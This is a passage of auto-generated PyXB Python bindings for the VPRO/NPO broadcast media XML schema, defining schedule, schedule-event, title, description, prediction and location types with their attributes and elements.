__channel = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'channel'), 'channel', '__urnvpromedia2009_scheduleType_channel', _module_typeBindings.channelEnum)
__channel._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 715, 4)
__channel._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 715, 4)
channel = property(__channel.value, __channel.set, None, None)
# Attribute net uses Python identifier net
__net = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'net'), 'net', '__urnvpromedia2009_scheduleType_net', pyxb.binding.datatypes.string)
__net._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 716, 4)
__net._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 716, 4)
net = property(__net.value, __net.set, None, None)
# Attribute date uses Python identifier date
__date = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'date'), 'date', '__urnvpromedia2009_scheduleType_date', pyxb.binding.datatypes.date)
__date._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 717, 4)
__date._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 717, 4)
date = property(__date.value, __date.set, None, None)
# Attribute releaseVersion uses Python identifier releaseVersion
__releaseVersion = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'releaseVersion'), 'releaseVersion', '__urnvpromedia2009_scheduleType_releaseVersion', pyxb.binding.datatypes.short)
__releaseVersion._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 718, 4)
__releaseVersion._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 718, 4)
releaseVersion = property(__releaseVersion.value, __releaseVersion.set, None, None)
# Attribute start uses Python identifier start
__start = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'start'), 'start', '__urnvpromedia2009_scheduleType_start', pyxb.binding.datatypes.dateTime)
__start._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 719, 4)
__start._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 719, 4)
start = property(__start.value, __start.set, None, None)
# Attribute stop uses Python identifier stop
__stop = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'stop'), 'stop', '__urnvpromedia2009_scheduleType_stop', pyxb.binding.datatypes.dateTime)
__stop._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 720, 4)
__stop._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 720, 4)
stop = property(__stop.value, __stop.set, None, None)
# Attribute reruns uses Python identifier reruns
__reruns = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'reruns'), 'reruns', '__urnvpromedia2009_scheduleType_reruns', pyxb.binding.datatypes.boolean)
__reruns._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 721, 4)
__reruns._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 721, 4)
reruns = property(__reruns.value, __reruns.set, None, None)
_ElementMap.update({
__scheduleEvent.name() : __scheduleEvent
})
_AttributeMap.update({
__channel.name() : __channel,
__net.name() : __net,
__date.name() : __date,
__releaseVersion.name() : __releaseVersion,
__start.name() : __start,
__stop.name() : __stop,
__reruns.name() : __reruns
})
_module_typeBindings.scheduleType = scheduleType
Namespace.addCategoryObject('typeBinding', 'scheduleType', scheduleType)
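# Usage sketch (editorial addition): scheduleType groups scheduleEvent children under
# channel/net/date bookkeeping attributes. 'NED1' is a hypothetical channel, since
# channelEnum's members are defined elsewhere in this module.
#
#   import datetime
#   day = scheduleType(channel='NED1', date=datetime.date(2009, 1, 1))
#   day.scheduleEvent.append(ev)      # ev: a scheduleEventType instance
#   day.reruns = False                # optional boolean attribute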
# Complex type {urn:vpro:media:2009}scheduleEventType with content type ELEMENT_ONLY
class scheduleEventType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}scheduleEventType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'scheduleEventType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 730, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}title uses Python identifier title
__title = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'title'), 'title', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009title', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 732, 6), )
title = property(__title.value, __title.set, None, None)
# Element {urn:vpro:media:2009}description uses Python identifier description
__description = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'description'), 'description', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009description', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 733, 6), )
description = property(__description.value, __description.set, None, None)
# Element {urn:vpro:media:2009}repeat uses Python identifier repeat
__repeat = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'repeat'), 'repeat', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009repeat', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 734, 6), )
repeat = property(__repeat.value, __repeat.set, None, None)
# Element {urn:vpro:media:2009}memberOf uses Python identifier memberOf
__memberOf = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'memberOf'), 'memberOf', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009memberOf', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 735, 6), )
memberOf = property(__memberOf.value, __memberOf.set, None, None)
# Element {urn:vpro:media:2009}avAttributes uses Python identifier avAttributes
__avAttributes = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'avAttributes'), 'avAttributes', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009avAttributes', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 736, 6), )
avAttributes = property(__avAttributes.value, __avAttributes.set, None, None)
# Element {urn:vpro:media:2009}textSubtitles uses Python identifier textSubtitles
__textSubtitles = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'textSubtitles'), 'textSubtitles', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009textSubtitles', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 737, 6), )
textSubtitles = property(__textSubtitles.value, __textSubtitles.set, None, None)
# Element {urn:vpro:media:2009}textPage uses Python identifier textPage
__textPage = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'textPage'), 'textPage', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009textPage', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 738, 6), )
textPage = property(__textPage.value, __textPage.set, None, None)
# Element {urn:vpro:media:2009}guideDay uses Python identifier guideDay
__guideDay = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'guideDay'), 'guideDay', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009guideDay', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 739, 6), )
guideDay = property(__guideDay.value, __guideDay.set, None, None)
# Element {urn:vpro:media:2009}start uses Python identifier start
__start = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'start'), 'start', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009start', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 740, 6), )
start = property(__start.value, __start.set, None, None)
# Element {urn:vpro:media:2009}offset uses Python identifier offset
__offset = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'offset'), 'offset', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009offset', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 741, 6), )
offset = property(__offset.value, __offset.set, None, None)
# Element {urn:vpro:media:2009}duration uses Python identifier duration
__duration = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'duration'), 'duration', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009duration', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 742, 6), )
duration = property(__duration.value, __duration.set, None, None)
# Element {urn:vpro:media:2009}poProgID uses Python identifier poProgID
__poProgID = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'poProgID'), 'poProgID', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009poProgID', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 743, 6), )
poProgID = property(__poProgID.value, __poProgID.set, None, None)
# Element {urn:vpro:media:2009}primaryLifestyle uses Python identifier primaryLifestyle
__primaryLifestyle = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'primaryLifestyle'), 'primaryLifestyle', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009primaryLifestyle', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 744, 6), )
primaryLifestyle = property(__primaryLifestyle.value, __primaryLifestyle.set, None, None)
# Element {urn:vpro:media:2009}secondaryLifestyle uses Python identifier secondaryLifestyle
__secondaryLifestyle = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'secondaryLifestyle'), 'secondaryLifestyle', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009secondaryLifestyle', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 745, 6), )
secondaryLifestyle = property(__secondaryLifestyle.value, __secondaryLifestyle.set, None, None)
# Attribute imi uses Python identifier imi
__imi = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'imi'), 'imi', '__urnvpromedia2009_scheduleEventType_imi', pyxb.binding.datatypes.string)
__imi._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 747, 4)
__imi._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 747, 4)
imi = property(__imi.value, __imi.set, None, None)
# Attribute channel uses Python identifier channel
__channel = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'channel'), 'channel', '__urnvpromedia2009_scheduleEventType_channel', _module_typeBindings.channelEnum)
__channel._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 748, 4)
__channel._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 748, 4)
channel = property(__channel.value, __channel.set, None, None)
# Attribute net uses Python identifier net
__net = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'net'), 'net', '__urnvpromedia2009_scheduleEventType_net', pyxb.binding.datatypes.string)
__net._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 749, 4)
__net._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 749, 4)
net = property(__net.value, __net.set, None, None)
# Attribute guideDay uses Python identifier guideDay_
__guideDay_ = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'guideDay'), 'guideDay_', '__urnvpromedia2009_scheduleEventType_guideDay', pyxb.binding.datatypes.date)
__guideDay_._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 750, 4)
__guideDay_._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 750, 4)
guideDay_ = property(__guideDay_.value, __guideDay_.set, None, None)
# Attribute midRef uses Python identifier midRef
__midRef = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'midRef'), 'midRef', '__urnvpromedia2009_scheduleEventType_midRef', _module_typeBindings.midType, required=True)
__midRef._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 751, 4)
__midRef._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 751, 4)
midRef = property(__midRef.value, __midRef.set, None, None)
# Attribute urnRef uses Python identifier urnRef
__urnRef = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'urnRef'), 'urnRef', '__urnvpromedia2009_scheduleEventType_urnRef', pyxb.binding.datatypes.anyURI, required=True)
__urnRef._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 752, 4)
__urnRef._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 752, 4)
urnRef = property(__urnRef.value, __urnRef.set, None, None)
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_scheduleEventType_type', _module_typeBindings.scheduleEventTypeEnum)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 753, 4)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 753, 4)
type = property(__type.value, __type.set, None, None)
_ElementMap.update({
__title.name() : __title,
__description.name() : __description,
__repeat.name() : __repeat,
__memberOf.name() : __memberOf,
__avAttributes.name() : __avAttributes,
__textSubtitles.name() : __textSubtitles,
__textPage.name() : __textPage,
__guideDay.name() : __guideDay,
__start.name() : __start,
__offset.name() : __offset,
__duration.name() : __duration,
__poProgID.name() : __poProgID,
__primaryLifestyle.name() : __primaryLifestyle,
__secondaryLifestyle.name() : __secondaryLifestyle
})
_AttributeMap.update({
__imi.name() : __imi,
__channel.name() : __channel,
__net.name() : __net,
__guideDay_.name() : __guideDay_,
__midRef.name() : __midRef,
__urnRef.name() : __urnRef,
__type.name() : __type
})
_module_typeBindings.scheduleEventType = scheduleEventType
Namespace.addCategoryObject('typeBinding', 'scheduleEventType', scheduleEventType)
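# Hand-written usage sketch (not part of the PyXB output): instances of
# scheduleEventType are usually obtained by parsing a document with the
# module-level CreateFromDocument() helper that PyXB generates, after which the
# properties declared above give typed access. The root element name and sample
# properties below are assumptions:
#
#   # event = CreateFromDocument(xml_bytes)   # assuming a scheduleEvent root element
#   # print(event.channel, event.start, event.midRef)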
# Complex type {urn:vpro:media:2009}scheduleEventTitle with content type SIMPLE
class scheduleEventTitle (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}scheduleEventTitle with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'scheduleEventTitle')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 756, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute owner uses Python identifier owner
__owner = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'owner'), 'owner', '__urnvpromedia2009_scheduleEventTitle_owner', _ImportedBinding_npoapi_xml_shared.ownerTypeEnum, required=True)
__owner._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 759, 8)
__owner._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 759, 8)
owner = property(__owner.value, __owner.set, None, None)
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_scheduleEventTitle_type', _module_typeBindings.textualTypeEnum, required=True)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 760, 8)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 760, 8)
type = property(__type.value, __type.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__owner.name() : __owner,
__type.name() : __type
})
_module_typeBindings.scheduleEventTitle = scheduleEventTitle
Namespace.addCategoryObject('typeBinding', 'scheduleEventTitle', scheduleEventTitle)
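# Hand-written usage sketch: a CT_SIMPLE binding takes its text content as the
# first positional constructor argument and its attributes as keywords. The
# literals 'BROADCASTER' and 'MAIN' are assumed members of ownerTypeEnum and
# textualTypeEnum respectively:
#
#   title = scheduleEventTitle('Avondjournaal', owner='BROADCASTER', type='MAIN')
#   assert title.owner == 'BROADCASTER'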
# Complex type {urn:vpro:media:2009}scheduleEventDescription with content type SIMPLE
class scheduleEventDescription (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}scheduleEventDescription with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'scheduleEventDescription')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 765, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute owner uses Python identifier owner
__owner = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'owner'), 'owner', '__urnvpromedia2009_scheduleEventDescription_owner', _ImportedBinding_npoapi_xml_shared.ownerTypeEnum, required=True)
__owner._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 768, 8)
__owner._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 768, 8)
owner = property(__owner.value, __owner.set, None, None)
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_scheduleEventDescription_type', _module_typeBindings.textualTypeEnum, required=True)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 769, 8)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 769, 8)
type = property(__type.value, __type.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__owner.name() : __owner,
__type.name() : __type
})
_module_typeBindings.scheduleEventDescription = scheduleEventDescription
Namespace.addCategoryObject('typeBinding', 'scheduleEventDescription', scheduleEventDescription)
# Complex type {urn:vpro:media:2009}predictionType with content type SIMPLE
class predictionType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}predictionType with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'predictionType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 793, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute state uses Python identifier state
__state = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'state'), 'state', '__urnvpromedia2009_predictionType_state', _module_typeBindings.predictionStateEnum)
__state._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 796, 8)
__state._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 796, 8)
state = property(__state.value, __state.set, None, None)
# Attribute publishStart uses Python identifier publishStart
__publishStart = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'publishStart'), 'publishStart', '__urnvpromedia2009_predictionType_publishStart', pyxb.binding.datatypes.dateTime)
__publishStart._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 797, 8)
__publishStart._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 797, 8)
publishStart = property(__publishStart.value, __publishStart.set, None, None)
# Attribute publishStop uses Python identifier publishStop
__publishStop = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'publishStop'), 'publishStop', '__urnvpromedia2009_predictionType_publishStop', pyxb.binding.datatypes.dateTime)
__publishStop._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 798, 8)
__publishStop._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 798, 8)
publishStop = property(__publishStop.value, __publishStop.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__state.name() : __state,
__publishStart.name() : __publishStart,
__publishStop.name() : __publishStop
})
_module_typeBindings.predictionType = predictionType
Namespace.addCategoryObject('typeBinding', 'predictionType', predictionType)
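# Hand-written usage sketch: predictionType is also CT_SIMPLE, so the platform
# name is the element text while the state and publish window are attributes.
# 'INTERNETVOD' and 'REALIZED' are assumed literals:
#
#   p = predictionType('INTERNETVOD', state='REALIZED')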
# Complex type {urn:vpro:media:2009}locationType with content type ELEMENT_ONLY
class locationType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}locationType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'locationType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 809, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}programUrl uses Python identifier programUrl
__programUrl = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'programUrl'), 'programUrl', '__urnvpromedia2009_locationType_urnvpromedia2009programUrl', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 811, 6), )
programUrl = property(__programUrl.value, __programUrl.set, None, None)
# Element {urn:vpro:media:2009}avAttributes uses Python identifier avAttributes
__avAttributes = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'avAttributes'), 'avAttributes', '__urnvpromedia2009_locationType_urnvpromedia2009avAttributes', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 812, 6), )
avAttributes = property(__avAttributes.value, __avAttributes.set, None, None)
# Element {urn:vpro:media:2009}subtitles uses Python identifier subtitles
__subtitles = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'subtitles'), 'subtitles', '__urnvpromedia2009_locationType_urnvpromedia2009subtitles', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 813, 6), )
subtitles = property(__subtitles.value, __subtitles.set, None, None)
# Element {urn:vpro:media:2009}offset uses Python identifier offset
__offset = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'offset'), 'offset', '__urnvpromedia2009_locationType_urnvpromedia2009offset', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 814, 6), )
offset = property(__offset.value, __offset.set, None, None)
# Element {urn:vpro:media:2009}duration uses Python identifier duration
__duration = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'duration'), 'duration', '__urnvpromedia2009_locationType_urnvpromedia2009duration', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 815, 6), )
duration = property(__duration.value, __duration.set, None, None)
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_locationType_type', _module_typeBindings.locationTypeEnum)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 817, 4)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 817, 4)
type = property(__type.value, __type.set, None, None)
# Attribute platform uses Python identifier platform
__platform = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'platform'), 'platform', '__urnvpromedia2009_locationType_platform', _module_typeBindings.platformTypeEnum)
__platform._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 818, 4)
__platform._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 818, 4)
platform = property(__platform.value, __platform.set, None, None)
# Attribute owner uses Python identifier owner
__owner = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'owner'), 'owner', '__urnvpromedia2009_locationType_owner', _ImportedBinding_npoapi_xml_shared.ownerTypeEnum, required=True)
__owner._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 819, 4)
__owner._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 819, 4)
owner = property(__owner.value, __owner.set, None, None)
# Attribute urn uses Python identifier urn
__urn = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'urn'), 'urn', '__urnvpromedia2009_locationType_urn', pyxb.binding.datatypes.anyURI)
__urn._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 11, 4)
__urn._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 11, 4)
urn = property(__urn.value, __urn.set, None, None)
# Attribute publishStart uses Python identifier publishStart
__publishStart = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'publishStart'), 'publishStart', '__urnvpromedia2009_locationType_publishStart', pyxb.binding.datatypes.dateTime)
__publishStart._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 12, 4)
__publishStart._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 12, 4)
publishStart = property(__publishStart.value, __publishStart.set, None, None)
# Attribute publishStop uses Python identifier publishStop
__publishStop = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'publishStop'), 'publishStop', '__urnvpromedia2009_locationType_publishStop', pyxb.binding.datatypes.dateTime)
__publishStop._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 13, 4)
__publishStop._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 13, 4)
publishStop = property(__publishStop.value, __publishStop.set, None, None)
# Attribute publishDate uses Python identifier publishDate
__publishDate = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'publishDate'), 'publishDate', '__urnvpromedia2009_locationType_publishDate', pyxb.binding.datatypes.dateTime)
__publishDate._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 14, 4)
__publishDate._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 14, 4)
publishDate = property(__publishDate.value, __publishDate.set, None, None)
# Attribute creationDate uses Python identifier creationDate
__creationDate = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'creationDate'), 'creationDate', '__urnvpromedia2009_locationType_creationDate', pyxb.binding.datatypes.dateTime)
__creationDate._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 15, 4)
__creationDate._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 15, 4)
creationDate = property(__creationDate.value, __creationDate.set, None, None)
# Attribute lastModified uses Python identifier lastModified
__lastModified = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'lastModified'), 'lastModified', '__urnvpromedia2009_locationType_lastModified', pyxb.binding.datatypes.dateTime)
__lastModified._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 16, 4)
__lastModified._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 16, 4)
lastModified = property(__lastModified.value, __lastModified.set, None, None)
# Attribute workflow uses Python identifier workflow
__workflow = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'workflow'), 'workflow', '__urnvpromedia2009_locationType_workflow', _ImportedBinding_npoapi_xml_shared.workflowEnumType)
__workflow._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 17, 4)
__workflow._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 17, 4)
workflow = property(__workflow.value, __workflow.set, None, None)
_ElementMap.update({
__programUrl.name() : __programUrl,
__avAttributes.name() : __avAttributes,
